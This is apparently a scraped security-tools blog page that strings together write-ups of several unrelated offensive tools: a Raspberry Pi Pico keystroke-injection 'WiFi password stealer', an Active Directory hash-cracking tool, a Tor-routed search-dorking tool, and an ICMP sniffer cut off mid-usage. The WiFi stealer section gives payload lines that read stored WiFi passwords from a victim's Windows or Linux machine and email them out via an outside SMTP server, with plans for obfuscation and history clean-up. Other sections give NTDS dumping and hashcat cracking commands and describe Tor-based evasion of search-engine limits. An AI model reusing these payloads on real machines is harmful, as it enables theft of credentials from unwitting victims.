Hacking With Your Nemesis | Aug 9, 2023 | https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows | Aug 2, 2023 | https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data | Jul 26, 2023 | https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker plugs a seemingly ordinary USB drive into a victim's computer and steals data from it? A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purposes only.

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer must have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good, budget-friendly solution, Rubber Ducky does offer things like stealthiness and support for the latest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

A keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses the STRING command to inject keystrokes. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. The ENTER and SPACE commands simulate presses of the corresponding keyboard keys.

Delays

We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input commands. For HIDs the setup time is very short, in most cases a fraction of a second, because the drivers are built in. However, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it, using encryption or compression, to avoid detection while sending it over the network. The two most common ways of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, the payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit the following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and your email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use an SMTP server from another email provider, but be mindful of the SMTP server and port number you write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles and uses plugins for reading and writing data. It stores network configuration profiles in an .ini-style keyfile format; the keyfile plugin supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with a regex to extract the data of interest. For filtering, a modified positive lookbehind assertion, (?<=keyword), was used. A positive lookbehind assertion on its own matches only a position in the string, namely the position right after the keyword, without making the keyword part of the match; the regex (?<=keyword).* therefore matches any text that follows the keyword. This allows the payload to match the values after the ssid and psk (pre-shared key) keywords.
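To make the lookbehind behaviour concrete, here is a minimal Python sketch that applies the same (?<=keyword).* pattern to an in-memory string. The sample text is made up and only imitates the keyfile layout, and the helper name value_after is hypothetical; it is an illustration of the regex, not part of the payload.

```python
import re

# Made-up sample that imitates NetworkManager's .ini-style keyfile layout.
SAMPLE_KEYFILE = """\
[connection]
id=WLAN1
type=wifi

[wifi]
mode=infrastructure
ssid=WLAN1

[wifi-security]
key-mgmt=wpa-psk
psk=pass1
"""


def value_after(keyword, text):
    """Return the rest of each line that follows `keyword` (hypothetical helper)."""
    # (?<=keyword) only asserts that the keyword sits immediately before the
    # match position; .* then consumes the remainder of that line.
    pattern = re.compile(r"(?<=" + re.escape(keyword) + r").*")
    return pattern.findall(text)


ssids = value_after("ssid=", SAMPLE_KEYFILE)
psks = value_after("psk=", SAMPLE_KEYFILE)
print(ssids, psks)
```

Note that the keyword itself never appears in the results, and that the line key-mgmt=wpa-psk is not matched because "psk" is not followed by "=" there.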

For more information about NetworkManager, here are some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once it is plugged into the computer, the machine sees it only as a USB keyboard. This isn't the default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, the name of the OS (windows or linux) and the name of the payload file (e.g. payload1.dd). Below you can find an example of how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admin's password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy. Quite the opposite: it's really bulky, especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

By: Zion3R


KnowsMore officially supports Python 3.8+.

Main features

  • Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
  • Import NTLM Hashes from NTDS.dit and SYSTEM
  • Import Cracked NTLM hashes from hashcat output file
  • Import BloodHound ZIP or JSON file
  • BloodHound importer (import JSON to Neo4J without BloodHound UI)
  • Analyse the quality of passwords (length, lower case, upper case, digit, special and latin)
  • Analyse similarity of password with company and user name
  • Search for users, passwords and hashes
  • Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
  • Other amazing features...
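As a rough illustration of the password-quality and name-similarity features listed above, the following Python sketch profiles the character classes of a password and scores its similarity to a name. The function names are hypothetical and the similarity metric (difflib's SequenceMatcher ratio) is an assumption chosen for the example; KnowsMore's own scoring may be computed differently.

```python
import string
from difflib import SequenceMatcher


def password_profile(password):
    """Summarise which character classes a password uses (hypothetical helper)."""
    return {
        "length": len(password),
        "lower": any(c.islower() for c in password),
        "upper": any(c.isupper() for c in password),
        "digit": any(c.isdigit() for c in password),
        "special": any(c in string.punctuation for c in password),
    }


def name_similarity(password, name):
    """Case-insensitive similarity of password and name as an integer 0-100.

    Assumption: uses difflib's ratio, not KnowsMore's actual algorithm.
    """
    ratio = SequenceMatcher(None, password.lower(), name.lower()).ratio()
    return round(ratio * 100)


profile = password_profile("Company@10")
exact = name_similarity("Company", "company")
partial = name_similarity("company123", "company")
print(profile, exact, partial)
```

A password identical to the company name scores 100 here, while variants with suffixes score lower but still well above unrelated strings.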

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords, like the output below:

KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

[+] Startup parameters
command line: knowsmore --stats
module: stats
database file: knowsmore.db

[+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
| top | description | qty |
|-------+----------------+-------|
| 1 | Total Users | 95369 |
| 2 | Unique Hashes | 74299 |
| 3 | Cracked Hashes | 23177 |
| 4 | Cracked Users | 35078 |
+-------+----------------+-------+

[?] General Top 10 passwords
+-------+-------------+-------+
| top | password | qty |
|-------+-------------+-------|
| 1 | password | 1111 |
| 2 | 123456 | 824 |
| 3 | 123456789 | 815 |
| 4 | guest | 553 |
| 5 | qwerty | 329 |
| 6 | 12345678 | 277 |
| 7 | 111111 | 268 |
| 8 | 12345 | 202 |
| 9 | secret | 170 |
| 10 | sec4us | 165 |
+-------+-------------+-------+

[?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
| top | password | score | company_similarity | qty |
|-------+--------------+---------+----------------------+-------|
| 1 | company123 | 7024 | 80 | 1111 |
| 2 | Company123 | 5209 | 80 | 824 |
| 3 | company | 3674 | 100 | 553 |
| 4 | Company@10 | 2080 | 80 | 329 |
| 5 | company10 | 1722 | 86 | 268 |
| 6 | Company@2022 | 1242 | 71 | 202 |
| 7 | Company@2024 | 1015 | 71 | 165 |
| 8 | Company2022 | 978 | 75 | 157 |
| 9 | Company10 | 745 | 86 | 116 |
| 10 | Company21 | 707 | 86 | 110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problems with dependency versions, check the Virtual ENV file.

Execution Flow

There is no mandatory order for importing data, but to get better data correlation we suggest the following execution flow:

  1. Create database file
  2. Import BloodHound files
    1. Domains
    2. GPOs
    3. OUs
    4. Groups
    5. Computers
    6. Users
  3. Import NTDS file
  4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate the data, and sync it to the Neo4j BloodHound database. This means you can use KnowsMore alone to import JSON files directly into the Neo4j database instead of using the extremely slow BloodHound user interface.

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: KnowsMore can import both BloodHound ZIP and JSON files, but we recommend using the ZIP file, because KnowsMore will automatically order the files for better data correlation.

Sync data to Neo4j BloodHound database

# Sync imported data to the Neo4j database
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhound-importer was inspired by the Fox-IT BloodHound Import implementation. We implemented several changes to save all data in the KnowsMore SQLite database and then do an incremental sync to the Neo4j database. This strategy has several benefits, such as being at least 10x faster than the original BloodHound user interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use secretsdump to extract the NTDS hashes with the command below

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o ~/Desktop/Wordlist/my_custom_wordlist.txt --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
knowsmore --ntlm-hash --export-hashes ~/Desktop/ntlm_hash.txt

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt
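For readers who prefer to do the field extraction in Python, the sketch below mirrors the cut command above: it takes the fourth colon-separated field of each line. It assumes the usual secretsdump line layout (user:rid:lmhash:nthash:::), and unlike cut it also skips malformed lines and drops duplicates. The function name and sample accounts are hypothetical; the hash values shown are the well-known hashes of an empty password.

```python
def nt_hashes(lines):
    """Yield each distinct 4th colon-separated field (hypothetical helper)."""
    seen = set()
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) < 4:
            continue  # not in user:rid:lmhash:nthash::: form
        nt = fields[3].lower()
        # An NT hash is 32 hex characters; skip anything else and repeats.
        if len(nt) == 32 and nt not in seen:
            seen.add(nt)
            yield nt


# Made-up sample lines for illustration only.
sample = [
    "CORP\\alice:1104:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "CORP\\bob:1105:aad3b435b51404eeaad3b435b51404ee:31D6CFE0D16AE931B73C59D7E0C089C0:::",
    "this line is not in the expected format",
]
hashes = list(nt_hashes(sample))
print(hashes)
```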

In order to crack the hashes, I usually use hashcat with the commands below

# Wordlist attack (paths left unquoted so the shell expands ~ and *)
hashcat -m 1000 -a 0 -O -o ~/Desktop/cracked.txt --remove ~/Desktop/ntlm_hash.txt ~/Desktop/Wordlist/*

# Mask attack (mask quoted so the shell does not treat ? as a glob)
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o ~/Desktop/cracked.txt --remove ~/Desktop/ntlm_hash.txt '?a?a?a?a?a?a?a?a'

Importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to the name of your company

Wipe sensitive data

As passwords and their hashes are extremely sensitive data, there is a module to replace the clear-text passwords and their respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you may find users' passwords in several ways, and you can add them to the KnowsMore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all cracked credentials into the Neo4j BloodHound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

For a remote connection, make sure that the Neo4j database server accepts remote connections. Change the line below in the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about which search engines SearXNG supports, see: Configured Engines

Setup

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard-coded server variable in parse_args.py, which is set to the IP address that Docker will assign to the first container you run on your machine (172.17.0.2). This can be changed, or overridden with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: --limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Verbose Output - Displays Raw JSON Output

Tips

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries.

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. 

Most often, the more passes you make over a search query the more results you'll find. 

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all.

Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename; the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations separate it's there for you.

Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.
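The idea of capping the number of in-flight requests can be sketched with a bounded thread pool. This is an illustration only and not DorXNG's actual implementation: fetch_page is a hypothetical stand-in that returns fake data instead of calling a SearXNG instance, and the default of four workers simply mirrors the suggestion above.

```python
from concurrent.futures import ThreadPoolExecutor


def fetch_page(page):
    """Hypothetical stand-in for one page request; returns fake results."""
    return {"page": page, "urls": [f"https://example.com/result/{page}"]}


def fetch_pages(pages, max_workers=4):
    """Fetch pages with at most `max_workers` requests in flight at once."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # map() returns results in input order even though calls overlap.
        return list(pool.map(fetch_page, pages))


results = fetch_pages(range(1, 9))
print(len(results), results[0])
```

Raising max_workers lets more requests overlap, which is exactly the trade-off described above: more parallelism, but a higher chance of rate limiting on a given circuit.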

If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor circuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... Yet... How many you run really depends on what you're doing. Each container uses approximately 1.25 GB of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor circuit that's refreshing every 10 seconds.

When running --serverlist mode disable the --timeout feature so there is no delay between requests (The default delay interval is 4 seconds).

Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit...

The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. 

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc...

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.
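Conceptually, merging one SQLite database into another amounts to copying rows while skipping duplicates. The sketch below shows that idea with Python's sqlite3 module and in-memory databases. The results table and its columns are a hypothetical schema invented for this example, so it should not be read as DorXNG's real table layout or merge logic.

```python
import sqlite3

# Hypothetical schema for illustration; DorXNG's real tables may differ.
SCHEMA = "CREATE TABLE IF NOT EXISTS results (url TEXT PRIMARY KEY, title TEXT)"


def merge_into(target, source):
    """Copy rows from source into target, skipping URLs already present."""
    target.execute(SCHEMA)
    before = target.execute("SELECT COUNT(*) FROM results").fetchone()[0]
    rows = source.execute("SELECT url, title FROM results").fetchall()
    # INSERT OR IGNORE drops rows whose primary key already exists.
    target.executemany(
        "INSERT OR IGNORE INTO results (url, title) VALUES (?, ?)", rows
    )
    target.commit()
    after = target.execute("SELECT COUNT(*) FROM results").fetchone()[0]
    return after - before


# Two in-memory databases that share one row.
a = sqlite3.connect(":memory:")
b = sqlite3.connect(":memory:")
a.execute(SCHEMA)
b.execute(SCHEMA)
a.execute("INSERT INTO results VALUES (?, ?)", ("https://example.com/1", "one"))
b.executemany(
    "INSERT INTO results VALUES (?, ?)",
    [("https://example.com/1", "one"), ("https://example.com/2", "two")],
)
added = merge_into(a, b)
total = a.execute("SELECT COUNT(*) FROM results").fetchone()[0]
print(added, total)
```

Because the copy happens in a single write transaction on the target, this also hints at why merging into a database that another process is actively writing to is risky.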

The included query.lst file contains every dork that currently exists in the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you... Our ghdb.db file contains over one million entries and counting! You can download it here: ghdb.db, if you'd like a copy.

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'
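A regex query against a SQLite file can also be reproduced outside the tool. SQLite has no built-in REGEXP implementation, so the sketch below registers one from Python and runs the same pattern against a small in-memory table. The results table, its url column, and the sample rows are assumptions made for the example, not DorXNG's documented schema.

```python
import re
import sqlite3


def regexp(pattern, value):
    """Backs SQLite's `value REGEXP pattern`; SQLite passes the pattern first."""
    return 1 if value is not None and re.search(pattern, value) else 0


conn = sqlite3.connect(":memory:")
conn.create_function("REGEXP", 2, regexp)

# Hypothetical table and rows for illustration.
conn.execute("CREATE TABLE results (url TEXT)")
conn.executemany(
    "INSERT INTO results VALUES (?)",
    [
        ("http://example.com/backup.sql",),
        ("https://example.com/index.html",),
        ("ftp://example.com/dump.sql",),
    ],
)

matches = [
    row[0]
    for row in conn.execute(
        "SELECT url FROM results WHERE url REGEXP ?", (r"^http.*\.sql$",)
    )
]
print(matches)
```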

A rewrite of DorXNG in Golang is already in the works. (GorXNG? | DorXNGNG?)

We're gonna need more dorks... Check out DorkGPT

Examples

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in *.db; do [ "$i" = new-database.db ] || ./DorXNG.py -d new-database.db -m "$i"; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.
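To show what "ICMP type" and "payload" mean at the byte level, here is a small standard-library sketch that builds and parses an ICMP echo header and verifies its checksum. ICMPWatch itself depends on scapy (see Requirements), so this is an independent illustration of the packet layout rather than the tool's code; all function names are hypothetical.

```python
import struct

ICMP_TYPES = {0: "Echo Reply", 8: "Echo Request"}


def checksum(data):
    """Internet checksum (RFC 1071) over `data`."""
    if len(data) % 2:
        data += b"\x00"  # pad to a whole number of 16-bit words
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(icmp_type, ident, seq, payload):
    """Build an ICMP echo message: type, code, checksum, id, sequence, payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet):
    """Decode the 8-byte echo header and report whether the checksum holds."""
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {
        "type": ICMP_TYPES.get(icmp_type, f"Other ({icmp_type})"),
        "code": code,
        "id": ident,
        "seq": seq,
        "payload": packet[8:],
        # Summing a valid message including its checksum field yields 0.
        "checksum_ok": checksum(packet) == 0,
    }


pkt = build_echo(8, 0x1234, 1, b"ping")
info = parse_icmp(pkt)
print(info)
```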

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  2. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
